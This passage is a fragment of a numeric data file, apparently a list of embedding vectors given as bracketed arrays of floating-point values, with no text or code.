,-0.0064048106,-0.076792434,0.03297871,-0.01773872,-0.022777557,0.0154497055,0.013881273,0.012863977,-0.041578103,0.005108111,0.044389952,0.0447775,0.033420745,-0.006104751,-0.003535326,0.0070291506,-0.02925238,0.022091668,-0.035889655,-0.09281025,-0.0031825432,-0.0031922143,0.026011365,-0.06854191,0.011395642,0.034691557,0.019132337,0.027581206,0.005760595,0.037437927,-0.054730147,0.039534677,-0.06456051,-0.039865118,0.08964759,-0.050945025,-0.0021365448,-0.0379168,-0.018836213,0.048107114,-0.012886157,0.05092717,-0.03621817,-0.0049125673,0.043356117,0.025036085,-0.01994511,-0.037608854,-0.0023879176,0.042290933,0.018210834,0.046133626,-0.016411709,0.009337079,0.009651998,-0.05459092,-0.017008502,0.04483314,0.0048667938,-0.031275824,0.030809678,-0.003384774,-0.034805935,0.00044032373,0.028382065,0.07200163,-0.0032715446,0.0024493227,-0.0192163,0.049282923,-0.016871592,0.046195503,0.0058319014,-0.021419525,0.019340772,0.014983992,-0.015353363,0.04661549,-0.00882881,0.0062359474,-0.030727837,0.0069660363,0.03248663,-0.018181765,-0.000962612,-0.068683095,0.007513145,0.01368537,0.014678269,0.06859369,-0.03969958,-0.011470562,0.030023098,0.023816224,-0.026260639,0.0053578503,-0.010066148,-0.0024168845,0.05527919,-0.04883056,-0.0028832643,-0.037757583,-0.00029165298,0.042946033,-0.059096925,0.03948579,0.04706272,-0.028309304,0.04147337,-0.043571975,-0.059454914,-0.009317275,-0.0041737505,0.0017794499,0.015596341,-0.034003492,-0.07829347,0.03570322,-0.026019158,0.02448166,0.045295555,-0.0014116925,-0.031745628,0.008266367,0.012150089,0.044458494,0.004816752,-0.011303185,-0.026686221,0.058994386,0.06667322,0.03300662,0.0045288713,0.0151708,0.015514047,0.030653754,0.054649986,-0.011448006,-0.03280046,0.04971974,0.036974575,0.030454122,-0.02272453,-0.083249964,0.021523545,-0.0019022787,0.03482825,-0.0037873527,0.018022722,0.03337252,-0.04995133,-0.016937599,-0.05433504,0.06616399,0.031458147,0.03648804,-0.0608918,-0.099289306,0.034765583,-0.02948646,0.012608259,0.003658571,-0.0043633617,0.11538909,-0.006320712,0.033604752,-0.02325629,0.03459012,0.041619167,0.005413311,0.0005861895,-0.053358573,0.06838744,0.021342058,-0.03768867,0.002268861,-0.033808574,0.022827363,0.06656236,-0.0782633,0.010506613,0.028355997,-0.081839904,0.023600873,0.051813092,-0.03110541,0.008444445,-0.014847965,0.023808789,0.03219135,-0.06631785,-0.037067402,-0.041817065,-0.04433833,0.05995774,0.029898794,-0.011261593,-0.017547622,0.014486593,0.046141252,-0.018741066,-0.02275539,0.0052142236,-0.016739488,-0.025993705,-0.019205287,0.03140351,0.048438746,0.00005824955,0.02067433,0.03284086,0.0037245362,0.032998156,-0.014738576,0.004625604,0.07238043,-0.070123404,-0.05448589,-0.0059714844,0.0055839294,0.003888245,-0.018378321,0.021599602,0.036730263,-0.02359591,0.020712864,0.05644127,-0.071233675,0.0028634125,0.017149234,-0.030708011,-0.016834367,0.0326466,-0.069076315,0.021921199,0.006323545,-0.09905061,0.06408299,-0.0020148468,0.011316202,0.0012640073,-0.042845994,0.0024498098,0.04668076,-0.00774146,-0.03967223,0.028748432,0.04510691,0.027239516,0.053944774,0.020899357,-0.025872592,-0.0017858191,-0.017105658,-0.03369499,0.017232059,0.028125428,-0.012949006,-0.04333531,0.0023719664,-0.05653083,-0.002218859,-0.05729222,0.025474567,-0.02845883,-0.0025609974,-0.042210013,-0.03426515,-0.041563004,-0.069722034,0.05222943,0.04782767,0.02887899,0.0069952174,-0.050050817,-0.01045238,-0.014124115,0.024828734,0.03921285,0.03724196,-0.040266715,0.044256978,-0.0046454323,-0.023836952,-0.05020436,0.02446694,0.03812272,-0.07304756,-0.031536903,0.05973844,-0.039950915,-0.013169141,0.049197435,-0.038429767,0.026020166,-0.039767526,-0.050926667,-0.0414889,0.016766936,-0.02808923,-0.0015650516,0.050692018,-0.009277115,-0.015991226,0.038920116,-0.0041573336,0.01995891,0.0010033156,-0.08002593,0.0047204373,0.029069202,0.06101511,-0.03981004,0.030376216,0.07448055,-0.014376871,0.0035707795,-0.033262756,-0.023178792,0.02559626,0.018294415,-0.009761467,-0.014549628,0.025771428,-0.022245307,0.023437941,0.010415035,-0.009022137,-0.03613467,0.024727868,-0.042316407,0.045753125,-0.043939237,0.00277382,0.0047377907,-0.027470771,-0.031099372,-0.006828138,-0.031657074,-0.022990644,0.029343938,-0.07431001,-0.02849736,-0.065288775,0.03689077,-0.037313286,0.05456702,0.042413745,0.05865304,0.03294123,-0.018518725,-0.0047821105,0.045323744,0.052904468,-0.048853565,-0.022239562,0.03916267,0.023835199,-0.01653878,0.07717484,0.07911484,0.026257064,0.01817732,0.011700043,-0.025761528,0.019365037,-0.03479152,-0.0770629,-0.021844223,-0.0028299012,-0.010388235,-0.009148617,0.01882425,-0.0071807737,-0.002922172,-0.002949704,-0.009064088,-0.025743587,-0.014046987,0.05105603,0.024065165,0.028127655,-0.04692634,0.021446176,-0.007994192,-0.0012505787,0.03746953,-0.031427603,-0.04207626,0.028490378,0.019151712,0.029350912,-0.030953698,0.015955335,-0.056624964,0.04667568,-0.016079213,-0.030672899,0.01696132,-0.02937413,-0.026940862,-0.052454516,-0.0064784023,0.008923972,-0.0023269288,0.015294188,-0.0071301428,-0.004553181,0.12340213,-0.00434156,0.033408426,-0.007874095,0.016154462,0.075575896,-0.008478292,0.03293599,-0.01954558,-0.006516359,-0.01424403,-0.04927048,0.035921577,0.018362844,0.037333466,0.021886207,0.040865082,-0.0047714063,-0.00204409,-0.061500687,0.028091457,-0.022050362,-0.018685255,-0.04747016,0.009240755,0.027652107,0.020084998,0.015291845,-0.017413585,0.011686829,0.0034079298,-0.023369817,-0.0063536367,-0.045851886,0.059844002,0.012408734,0.02769172,-0.0010678528,-0.018726533,-0.051592845,-0.035285294,-0.03515486,0.03793352,-0.01685541,-0.008330968,-0.00769316,-0.021055063,-0.009212919,0.051327337,0.020987682,-0.06982357,0.03391618,-0.0019046519,0.015465707,-0.0012068797,-0.004115408,-0.01709318,-0.011325584,0.04727471,0.09628151,0.01350022,-0.0014676901,0.039791312,0.008048654,-0.004340362,-0.03851585,-0.02080216,-0.041746233,-0.0047680056],[-0.012425297,0.07593906,-0.19080551,-0.04730415,0.089928165,0.012364304,0.009191557,0.0485407,-0.025198344,-0.022984901,0.02126097,0.0035303677,0.10993649,-0.006400215,0.050021507,-0.018053677,-0.026857167,-0.08926164,-0.017176643,0.030386675,-0.031291295,-0.016219119,0.013730096,-0.023674559,0.045096025,0.025254745,0.0057411864,-0.044437584,-0.017071018,0.0015082951,0.03484287,-0.030316172,-0.0032725974,0.035256498,-0.064466566,-0.04884343,0.0062682983,0.042583805,0.01056167,-0.011534433,0.036930356,0.015021964,0.01436959,-0.036212027,-0.0074558724,0.041935984,-0.016501632,-0.022619829,0.049906038,-0.054502796,0.0129079,-0.010637971,0.03814168,0.06404789,0.107100785,0.04127913,-0.02025902,0.023096323,0.011100979,-0.067716084,0.1011339,0.07457519,-0.10551193,0.019582372,0.025046246,-0.056801163,-0.04247483,0.0438703,0.00841191,-0.04909855,0.038017288,-0.014301769,0.01016201,0.031637605,-0.077559724,-0.037945755,-0.0077645015,-0.036139235,-0.019688493,0.033007327,0.012104782,0.034358896,0.0809574,0.018008804,0.049740277,-0.045492787,-0.031055566,-0.00018517801,0.009009901,0.086283706,0.02509656,-0.005530155,-0.0075844144,-0.012155522,-0.058420632,0.029527996,-0.0066733765,0.030944116,-0.018253257,0.0030521643,-0.057606854,-0.029042182,0.021700805,0.026443066,0.0006486019,0.060658187,0.0076974174,0.015814576,-0.03210874,-0.01734434,-0.022688076,0.058392923,-0.040949177,-0.010300544,-0.055556476,-0.016545262,0.016153758,-0.014978906,-0.04655921,0.015760371,-0.0018484198,-0.004152144,0.011791349,0.05858647,-0.025688408,0.0076029743,-0.035946228,0.019210367,-0.012621781,-0.0094370255,-0.03140929,-0.029994149,-0.055579424,-0.013020645,0.03347784,0.063327245,-0.06562969,-0.0025527119,0.011546363,0.029554084,0.0030679414,0.05769591,-0.025991587,-0.04982326,-0.0018908184,-0.012217333,0.040627997,-0.04104187,-0.05120038,0.018931327,0.067381725,0.038927052,-0.015849955,-0.000049016984,0.012591095,-0.020198677,0.02425963,-0.012554699,0.01823267,-0.011342037,0.038002647,0.028093494,-0.082902685,0.0241806,0.026198776,-0.043063823,0.011415806,0.0013065158,0.0023928946,0.040505223,-0.052600212,-0.015324771,0.032270532,-0.00011771137,0.022076251,-0.04612306,0.058572456,-0.04360449,0.049753167,-0.0180757,0.02760452,-0.07979322,0.029561762,-0.008746122,-0.022074245,-0.01650032,-0.0016281978,-0.017276987,0.020903375,-0.01726391,0.00022664733,-0.010101042,-0.063447565,-0.033504378,-0.005943314,-0.068962485,0.04000554,0.0027660944,0.009804132,-0.026994819,-0.043340575,-0.010059644,-0.06427007,0.0075330078,-0.057822127,0.073036276,-0.014305052,0.024383452,-0.04859132,0.042160142,0.047402546,-0.017354513,0.024321726,0.024958344,0.03227932,0.0012360382,-0.01189718,-0.024802394,-0.017147219,0.02676979,-0.014605756,-0.008064152,-0.0029664938,0.018977966,0.008062435,-0.0077829813,-0.047660645,-0.026405912,-0.0003840738,0.0016256751,0.004283781,-0.08900332,0.019316167,-0.010273861,0.007994217,0.025788652,0.03795722,0.06102695,0.004816505,0.05225168,-0.009567067,0.010082399,-0.020677822,-0.010786821,-0.029353797,0.004043503,-0.008381784,-0.025986718,-0.012439608,0.03427856,0.009359327,-0.009943896,0.030057859,0.01728741,0.026714955,-0.033690646,-0.021570185,0.00038736407,0.016933646,0.04397115,0.06983745,-0.041895404,0.0034621984,-0.055195484,-0.041211437,0.02428592,-0.034264993,0.011329905,-0.00026403015,-0.0015430523,0.04592963,0.025571853,0.0117485905,0.016955717,-0.007706058,0.03379228,-0.034731496,-0.015334305,-0.020533856,-0.029082125,-0.045827772,-0.020991128,-0.0008310746,0.027361736,-0.019760752,0.031715453,0.009223777,0.024677793,0.03732346,0.0036478802,0.015908645,-0.018237092,-0.028973999,0.021592554,0.0015671762,0.02002473,0.04151206,0.0066958186,0.019236142,-0.085915595,0.058182642,0.042228993,0.06430494,0.011701557,0.00891642,-0.0105556315,0.028451292,-0.012535583,-0.030341934,-0.03293548,-0.058795683,-0.0065247105,-0.025290532,0.017688053,-0.03976099,0.03263073,0.030684184,-0.002013051,0.032657012,0.017826376,0.050748512,-0.051113818,0.006479206,-0.05219452,-0.02749406,0.075015254,-0.00034484884,-0.018968087,-0.017009897,-0.02227161,0.06638065,0.01678393,0.034169197,-0.038915016,-0.06196629,0.041656435,0.02040117,-0.011901739,0.0040467232,0.038627565,0.025560124,0.02753519,0.01750222,-0.032617554,0.01007714,0.009189685,-0.042100403,-0.047854953,0.047928516,0.024891883,-0.004530506,0.022857765,-0.010812807,-0.028865578,-0.017828383,0.022789713,0.026585631,0.018607976,0.024255032,-0.023321109,0.06978248,0.008037101,0.0038619644,0.014729488,-0.0036698324,0.0050927275,0.014933262,0.015301868,0.024423705,0.03578342,0.009707418,-0.007606578,-0.014864089,0.012978242,-0.005417012,-0.026777433,-0.112561375,0.01438209,-0.014928793,0.008959389,0.025112428,0.01853886,-0.020670502,0.0054729125,0.05868773,-0.0072873216,0.019471977,-0.034307953,0.016742248,-0.0009239827,-0.021084128,-0.031721793,-0.04181991,0.015048988,0.0028055308,-0.055678263,-0.011819199,0.07124325,0.01260499,0.06415519,-0.04508083,-0.075299494,-0.012438685,-0.016956924,-0.018318027,0.040836606,-0.0513771,-0.041342944,0.02622815,0.0164701,0.030927602,0.027419882,-0.03285809,-0.049612723,0.010093401,0.041910548,0.037459504,-0.028638767,-0.04219467,-0.028145758,0.032825883,0.014726777,0.04199453,0.0047757574,0.04229579,0.07786931,0.05962915,0.051962957,0.00040245836,-0.03073979,0.07503034,0.01836119,0.03842187,0.0141865285,-0.04234493,0.021083932,0.028743694,0.03451082,-0.05019537,0.04278996,0.013759011,-0.05184324,-0.035281003,-0.039538518,0.021790313,0.04804977,0.024474174,-0.026349599,-0.09128541,0.0664749,0.0043904153,-0.012382221,0.010403005,0.025571821,0.119606644,0.019484954,-0.007434481,-0.004969109,0.0065122643,0.022169806,0.013191131,0.017070005,-0.042714667,0.010801366,0.021666912,-0.040482957,-0.037220526,-0.05390753,0.03163805,0.059469137,-0.056509282,-0.0070764516,0.024325514,-0.042884767,-0.03656029,0.030268174,-0.03780133,-0.027050944,0.0029677432,0.061645743,0.02505263,-0.037413795,-0.017975995,-0.029284356,-0.004261228,0.031788524,0.010471256,-0.015645836,-0.013241786,-0.024488667,0.02075278,0.0036933275,0.040296856,0.020349791,-0.033850294,-0.015247617,-0.0019633388,0.019574897,0.02261756,-0.00797157,0.024265751,0.05630164,0.021081856,-0.01850545,-0.00157628,-0.017869132,0.08128753,-0.04979292,-0.04406058,-0.021711351,-0.016255056,-0.009840611,0.0103742,0.054953817,0.036618322,-0.05885523,0.015591589,0.027497057,-0.03355587,0.012780742,-0.0015460768,-0.029461188,-0.026038727,-0.0067167133,-0.054673664,-0.0065747853,0.020388896,-0.030981766,0.020434236,0.03321634,0.067639075,0.033396665,-0.06647843,-0.042472046,0.018799553,0.017697023,-0.07685315,-0.00939836,0.008543574,0.04651783,-0.013265366,0.045210604,0.020581856,-0.010950388,0.031187065,-0.028570328,-0.02724336,0.013854015,0.040069584,-0.08470279,0.011212381,-0.02304915,0.021790573,-0.033811115,0.029423475,-0.07204052,0.0017446671,-0.010365982,-0.04958478,-0.07134068,-0.0303886,0.039775774,0.04947739,0.01979054,-0.026604915,-0.012060341,0.014848951,-0.006531046,-0.001088607,0.009717484,-0.020768559,-0.036919966,0.028044144,-0.009639768,0.012582831,0.043850508,0.039844364,0.015803156,-0.039731845,-0.076733984,0.032351665,-0.039434735,0.047199465,0.030284539,0.002397354,-0.009503906,-0.08335019,-0.007272455,-0.0056927046,-0.04128007,-0.011260578,0.017239263,0.03860532,-0.02772537,-0.032795567,-0.0015563581,-0.0144183375,-0.004925424,-0.037284825,-0.098774,0.0037390075,0.022742426,0.036676116,-0.028869027,0.013099058,0.051022574,0.007669637,0.0008299861,-0.011009394,0.0011089373,0.018376624,0.0390509,-0.045995224,-0.0036593457,0.0050728037,-0.06908981,0.06282328,-0.036353007,-0.019279107,-0.023694644,-0.025389675,-0.044134848,0.064218305,-0.05313905,0.017266106,-0.05231294,-0.032284793,0.0006764268,0.01176995,0.018445855,-0.04415424,-0.0014729875,-0.06527468,0.009598441,-0.091319755,0.0033852102,-0.016281145,0.012948624,0.0051694433,0.04557852,0.03773524,-0.03152376,0.011161992,0.016811129,0.09158977,-0.018087374,0.017633243,0.060112495,0.060419243,-0.03241765,0.06337171,0.060173288,0.008763209,-0.009907355,0.01042271,-0.04551561,0.02136135,-0.020124014,-0.017813863,-0.029818535,-0.031297892,-0.0056659584,0.0061785127,-0.020414684,0.008377767,-0.0133326985,0.011013627,-0.0118328715,-0.004502384,-0.018598426,0.04977047,-0.000960547,-0.011654197,-0.05111814,0.019570213,0.019784495,0.018442294,0.021164555,-0.01848954,-0.04138556,-0.013462678,0.016377807,0.040371906,-0.03532323,-0.004256934,-0.042200238,0.02010423,-0.054870628,0.016976241,0.00018428151,-0.026848951,-0.05151293,-0.034674034,0.003835981,0.014858552,0.011537995,-0.012196269,-0.0009086402,-0.01201585,0.07173086,-0.021792652,-0.013776758,0.010588666,0.027961303,0.022430483,0.015648367,0.039249063,0.0341357,0.012027392,-0.049000975,-0.026807996,0.00082993,-0.0151044205,0.02490428,0.022563899,0.030216586,-0.023280688,-0.016164156,-0.019770749,0.02323002,0.05012835,-0.019727243,-0.028318154,0.010616274,0.008123096,0.010915326,0.0011106341,-0.0424137,0.039411347,0.0016359767,-0.022200968,0.010437863,-0.024058798,0.05689053,0.010080122,0.02537145,0.0114594735,-0.0193416,-0.055137813,0.003082335,-0.011704472,0.032806892,0.00066199497,0.016510878,-0.0391618,-0.019583667,-0.0075507807,0.0658523,-0.012282677,-0.030726232,-0.008588064,0.015421372,-0.0017999022,0.012408329,-0.058932647,0.0027282578,0.0045717927,0.027166117,0.116765775,0.031694036,0.0033185685,-0.0097936895,0.112168655,0.0039321203,-0.05146959,-0.014074126,-0.023244638,-0.0066368934],[0.02539998,0.09554637,-0.15808435,-0.0811074,0.11821515,-0.05515277,0.08422757,0.008557758,-0.012665385,-0.03010873,-0.02307223,0.034124855,0.09503195,0.043085538,0.021276314,-0.019353665,0.0013176939,-0.07008611,-0.014122037,0.052994583,-0.023836952,0.0050506094,0.0009921299,-0.012896451,0.037498146,0.032245602,0.0042534783,0.016676877,0.009201641,0.0059064394,0.04023898,-0.049621083,0.012516734,0.008402194,-0.0993418,-0.01870516,0.06861458,-0.005054247,-0.030997364,0.007131791,0.038884442,0.01637856,0.03411887,-0.03734761,-0.012228535,-0.022370735,0.013016835,0.02564875,0.049366545,-0.057265013,-0.03975512,-0.051413007,-0.0032048735,-0.011700224,0.06342802,0.09774529,0.027228422,0.0278436,0.0022786388,0.001913623,0.043546174,0.03905838,-0.027150013,0.021107255,0.03157386,-0.0153714055,-0.033168685,0.058472436,-0.0064998567,-0.026349554,0.03664256,-0.05415058,-0.026155792,0.015782135,-0.055584714,-0.022756143,-0.021644106,0.017996252,0.039878715,0.03670462,0.043804213,-0.036752336,0.07601836,0.0017076452,-0.0017305922,0.0023580967,-0.02956177,-0.015567699,-0.027880935,0.038945086,-0.020982588,-0.009697311,-0.004350095,-0.018736813,-0.075100705,0.011074398,0.005722508,0.02557931,-0.025684346,0.0074770055,-0.04664465,-0.018526997,-0.03327915,-0.034247067,-0.008070886,0.035216734,0.02594075,0.02094318,0.0041763927,-0.03279039,-0.017956754,0.066305794,-0.046180867,-0.030153343,-0.01118056,-0.008444704,0.059857298,-0.011579714,-0.017388212,-0.0019267296,0.010253819,-0.06349925,-0.030374706,0.0072836573,-0.008247377,0.017487654,-0.04014094,0.0321501,-0.040160775,-0.023106884,-0.035535607,-0.0046582688,-0.07948894,-0.023672976,0.0043565338,0.0510769,-0.037843112,-0.036960453,0.01265302,0.01428253,0.029364258,0.022550745,-0.026676102,-0.050611578,-0.013034792,-0.02674245,0.06035009,-0.019741375,-0.029910827,0.028390571,-0.018286852,0.020200113,0.004283698,0.018847259,0.04166344,-0.010568176,0.011888262,0.016151104,-0.0034573318,-0.00069795584,0.030193573,0.00059265236,-0.06163513,0.021594044,0.0017334643,-0.009325625,-0.020946916,0.045566544,-0.022641111,0.04568737,-0.07786591,-0.0083929235,0.021385979,-0.029329794,0.052006148,0.018804496,0.107539855,-0.01475293,-0.007999628,-0.047256533,0.021277795,-0.054401007,0.05686835,0.004436818,-0.01801856,-0.0020577603,-0.015886689,0.03152228,0.010274311,-0.011224992,-0.016035488,-0.033367112,-0.08878476,-0.007812803,-0.03988436,-0.062454186,-0.0012622239,0.006634375,0.04052702,-0.020401062,-0.041458476,-0.04529573,-0.014437218,-0.02735632,-0.06844124,0.053707633,0.010658822,0.027652029,-0.024239808,0.051148556,0.07510892,-0.0014365556,0.012313086,0.014056705,-0.053349394,-0.024804333,0.028418254,-0.030955818,-0.018388009,-0.0051914183,0.009320643,-0.024286551,-0.024188662,-0.0030104069,0.019617548,0.010927603,-0.027997853,-0.035724934,0.010658321,-0.009954468,-0.05418555,-0.08031228,0.039817803,0.00074447726,0.04077768,0.0072513213,-0.00037604678,0.013738176,0.008219325,0.041105695,-0.004997808,0.06184526,-0.017864041,0.011016104,-0.05454148,-0.031655375,0.0072707534,-0.06484502,-0.0108663635,0.03957182,-0.034718726,-0.02615468,0.031092793,-0.004828283,0.044655673,-0.031124227,-0.02883435,0.04920471,0.03141242,-0.004740138,0.029668732,-0.03325859,-0.016899448,-0.005274778,-0.029505054,-0.067989446,-0.009008349,0.016305322,0.022098565,-0.034510072,0.020717373,0.051402017,0.019560061,0.027463416,-0.012771616,0.009901541,-0.014094223,-0.0010777399,0.023958847,0.008312161,-0.0049653766,-0.008925619,-0.03450854,0.02901357,-0.012428268,0.016426843,-0.018025875,0.009830375,0.00080873264,0.0033546141,0.010729964,-0.02130257,-0.06734866,0.030858098,-0.004864182,0.040527657,0.047641285,0.011675909,0.018177997,-0.056259096,0.040935457,0.012979232,0.035106998,0.03615303,0.01386407,-0.0028090724,0.0010132401,-0.0007178684,0.011074816,-0.045107305,-0.03393206,-0.008506669,-0.050753396,-0.005048631,-0.014038889,-0.03569794,0.023345778,0.05130174,0.0025884968,-0.013060155,-0.019384112,-0.036063608,-0.019008264,-0.032421142,-0.014315331,0.085278034,-0.0084239775,-0.008653443,-0.021408979,-0.049650542,0.051886767,0.014375831,-0.0063488437,-0.031533778,0.0016022049,-0.021439068,0.022483736,0.03988596,-0.009473969,0.05794431,0.019728174,0.0401969,0.039374407,0.0023118707,-0.007047937,0.015616753,-0.035486255,-0.00027709818,0.05669053,0.030286882,-0.01837307,0.016180584,-0.036373176,0.0034776567,0.022087688,0.023342593,0.06003229,0.06529204,0.025199661,-0.032347128,0.07499003,0.022457857,-0.0059630824,0.029049926,-0.0036877594,0.0016676815,0.021280004,0.006724626,0.00005968909,0.017554572,0.021873262,-0.028378602,-0.038840435,0.042385727,0.022805518,0.01840087,-0.04335839,0.00446385,-0.00093414815,0.028321719,0.013745147,0.005470989,-0.0124541065,-0.017827421,0.06263875,0.013102238,-0.005331406,-0.060509592,0.007293915,0.048405707,0.00009892168,-0.03384828,-0.026965393,0.019649824,0.040905178,-0.025155902,0.019245034,-0.012167563,0.011055178,0.019731272,-0.03748186,-0.05808538,0.0071228016,0.016185284,-0.02404156,0.036731586,-0.023247387,-0.05478757,0.093470275,-0.007782281,0.040456317,0.017182956,-0.0727486,-0.053202905,-0.02333367,0.019407576,0.04613195,0.0010563871,-0.007923038,-0.020495968,0.035315756,0.04181876,0.026666433,0.0028491758,0.030635072,0.025341822,-0.007110708,0.041654136,-0.017674705,-0.06726256,0.03218811,0.017573152,0.05943575,-0.007709905,0.001633693,0.0053502666,-0.0009954803,0.07361895,-0.025940226,0.062174127,0.030222302,-0.0135818105,-0.04192133,-0.017406736,0.007206497,0.024058428,0.07739397,-0.0690485,-0.07668918,0.037909217,-0.01127753,0.055877097,-0.015054936,0.01408946,0.11316878,-0.0013109627,-0.023147931,0.006602403,-0.028475322,0.0099294,-0.008329961,-0.014154597,-0.0720107,0.0611804,0.03343568,-0.015408224,0.0044162576,-0.049980775,0.08721259,0.084696405,-0.045400474,0.014476707,0.055620443,-0.050363462,-0.01014448,-0.002202846,-0.015553969,0.03205786,-0.0016367318,0.077152364,0.045828376,-0.018537898,-0.0125275245,-0.062436447,-0.029570924,0.054416534,0.037705697,-0.019659497,0.00791826,0.018891945,0.025735294,-0.03269677,-0.013595982,-0.040596213,-0.03406618,-0.00705041,-0.010343067,0.046906073,0.005087233,0.01783899,-0.006896459,0.044250134,0.00032708936,0.01899669,0.004847307,-0.0562861,0.03914326,-0.09073712,-0.05278619,-0.0038048143,-0.01854499,-0.00024715607,0.016670235,0.029874863,0.04130438,-0.02305818,0.03672709,-0.04219587,-0.042598184,0.03396765,0.05274026,-0.056207612,-0.032420687,-0.03060419,-0.055554274,0.006720079,0.0037542665,-0.076774284,0.008689161,-0.004160435,0.0035872692,0.0072122845,-0.030526545,0.002402512,0.0029465498,-0.00019961498,0.00581891,-0.008697167,0.015071529,0.008545902,0.013288369,0.030770577,0.03589876,-0.016511846,0.033845853,-0.008083723,-0.020162454,0.059742622,-0.0036998468,-0.05083425,0.03592264,-0.027803449,-0.022248123,-0.039845355,0.026130876,-0.013736678,-0.007174625,-0.03912761,-0.017886128,-0.058118027,-0.060263574,0.024621282,0.041029923,0.03465408,-0.0019369638,-0.019266585,-0.015300736,0.016415637,0.01603823,0.05448084,0.07094843,-0.048726697,-0.000741625,-0.005046095,-0.018739969,0.006210581,0.030469554,0.033959277,-0.056693435,-0.030193591,0.022957098,-0.048336003,0.031767715,0.0422535,-0.013073364,0.014489824,-0.088005506,-0.027656056,0.03619769,-0.028342241,-0.050038327,0.01608079,0.010821584,-0.039681178,0.006056953,0.0013826459,0.012579724,-0.044355016,-0.01802312,-0.04281884,0.027832687,0.024904981,0.051390566,-0.055361588,0.006722714,0.045153372,-0.0020272806,0.00046903885,0.007227279,-0.0034854177,0.017962977,0.018666906,-0.003909953,-0.02739916,0.0034811285,0.0011243955,0.045163676,0.013022934,-0.010602452,-0.038432166,-0.02761405,-0.04816501,0.0701968,-0.054484103,0.01453424,-0.025741218,0.00010967083,-0.012788234,0.01933169,0.04713373,-0.062553026,0.004116569,-0.09825847,0.021282196,-0.07139559,0.008173452,-0.0069946307,0.03929831,-0.039214414,0.076049894,0.0429625,-0.034454178,-0.04687683,0.07344635,0.0143137835,-0.04061076,0.008805799,0.028461957,0.007998085,0.0015527894,0.06954946,0.07389809,0.01867676,0.022243485,-0.010234279,-0.026320467,0.014467236,-0.02916856,-0.055197157,-0.041414034,0.011400298,-0.0020680223,-0.046435,0.028359752,-0.0038595172,-0.021255583,-0.03780198,0.015751496,-0.03248989,-0.042387683,0.033182006,0.010991802,-0.009495173,-0.03450877,-0.0040229885,-0.012893799,0.029403303,0.041477658,0.0094694,-0.026451096,0.018234516,-0.015033855,0.03126523,-0.03783344,0.006191204,-0.058632586,0.0782884,-0.00664246,-0.0688245,-0.028726589,-0.0077178692,-0.04726132,-0.0063974704,-0.027907526,0.020630697,0.00782238,-0.008804937,-0.012142289,-0.018038606,0.06770196,-0.019622492,0.012902259,-0.020938909,0.046164766,0.0072623724,-0.021968773,0.08027635,0.0041865376,-0.020556435,-0.030027173,-0.032901578,0.0052641104,-0.05950516,0.07609961,0.040608015,0.026059037,0.01413074,0.03182438,0.00038695487,0.029580675,0.010125425,0.017263966,-0.060438555,0.01524674,-0.005155925,0.0021305068,0.028886324,-0.029498447,-0.015685383,0.04389035,0.033057526,-0.014924635,-0.028762484,0.10386788,0.015204319,0.027732117,-0.029027289,-0.008730819,-0.062016923,-0.023810454,0.005887821,-0.010030062,-0.03673658,0.02752462,-0.019150151,-0.0199068,-0.03684205,0.07437339,0.046223354,-0.028910482,0.0052589574,0.0038751948,-0.022981225,0.0031951051,-0.017391147,-0.009240008,-0.046366636,0.020795256,0.11438019,-0.028414695,0.014713582,-0.013420624,0.01874565,-0.012538589,-0.04840371,0.0017098358,-0.0052301865,0.011793242],[-0.02497202,0.062273487,-0.17550395,-0.107107416,0.10686711,0.01415731,0.030048434,0.01356554,-0.02394195,-0.006051167,0.0041695274,-0.00936157,0.062446192,0.0052117123,0.012665883,-0.002596428,0.012560054,-0.055735268,0.008219831,0.0413827,-0.033166695,-0.023986643,0.00039837914,0.0059202006,0.04360651,0.0074069384,-0.021194257,-0.0055279834,0.018632073,0.010150254,0.053053863,-0.031146219,-0.0090811355,0.06914908,-0.09601944,-0.03593521,0.04460527,0.034214914,0.00064041524,0.0021188196,0.033214863,0.011490976,0.027580393,-0.06724164,-0.0063205548,0.013390339,0.012102233,-0.026401684,0.053962857,-0.02946632,-0.020698758,-0.03569316,0.040248707,0.042984616,0.10806783,0.05847026,0.005921266,-0.012330049,-0.011339996,-0.07409219,0.07683749,0.022761289,-0.106089205,0.02940833,0.0029442457,-0.026164994,-0.029112484,0.060379546,-0.0012086112,-0.03827888,0.0630325,-0.025236977,0.02363704,0.029254593,-0.032728553,0.029395549,0.0330625,0.02874398,-0.012416979,0.02294288,0.038922466,-0.061055586,0.08384263,-0.018308332,0.021744067,-0.015400329,-0.02916218,-0.025134282,0.024225011,0.07704307,0.013369105,0.007623908,0.011520204,0.0096941395,-0.007404877,-0.008137589,-0.0160727,-0.0068488866,-0.052449834,0.037753258,-0.045895632,-0.03704679,0.016308414,-0.023408096,0.038342163,0.03628298,0.027879348,-0.013872549,-0.01507171,-0.03666389,-0.018852396,0.020066328,-0.049871165,-0.0059023304,-0.054436848,-0.012523227,0.013934021,-0.006492878,-0.017566117,0.015184738,0.01839133,-0.0005110839,0.002062995,0.03429169,0.0029589098,0.03841967,-0.07710016,-0.000570512,-0.030515678,0.012303453,-0.009932826,-0.024750123,-0.067370616,-0.02199024,0.001124204,0.058472477,-0.025628839,-0.02024494,0.026967112,0.05957468,0.028358731,0.042467978,-0.02645306,-0.033071943,-0.021126224,-0.04770184,0.014644716,-0.087008774,-0.015764263,-0.014232095,0.032636993,0.032957584,-0.042620026,0.034565367,0.038271733,-0.00827058,0.008398169,-0.0077370587,0.03117485,0.021161795,0.028869746,0.024357257,-0.060806483,0.0405437,0.04546711,0.010750335,0.014672721,0.026984502,0.046314277,0.013585615,-0.044069424,-0.03822488,0.024393583,-0.00042571436,0.06516922,-0.020698927,0.06311158,-0.03405754,0.013519358,0.0014638766,0.01847325,-0.044722654,0.06825502,-0.0022586307,-0.020743368,-0.03655839,-0.025150064,-0.037258554,0.0008652699,-0.0076285484,-0.00078363455,-0.011699433,-0.073553555,0.010417164,0.0032598958,-0.08300165,0.05480584,0.0146308625,0.022226939,0.017370949,-0.025578279,-0.032349564,-0.039204974,0.0024783364,-0.06778801,0.045972046,-0.0015781858,-0.006341083,-0.048706036,0.0071774917,0.08658527,0.01378101,0.041129418,-0.0015985492,-0.018144641,0.0012004011,0.0033930421,-0.012233379,0.013325757,-0.047471114,0.015320439,0.012393748,-0.0031560438,-0.018764898,-0.007195272,-0.007880228,-0.049094617,-0.02773445,0.005037261,-0.0058200946,-0.0050216406,-0.07728108,0.0785783,-0.0042844024,0.030795136,0.0530001,0.018249331,0.055712424,-0.0043020616,0.01193561,0.038592968,0.028630462,-0.010324193,0.013418448,-0.047078665,-0.015601976,0.032629218,-0.02223126,-0.014056657,0.05900606,0.0077692014,0.020056186,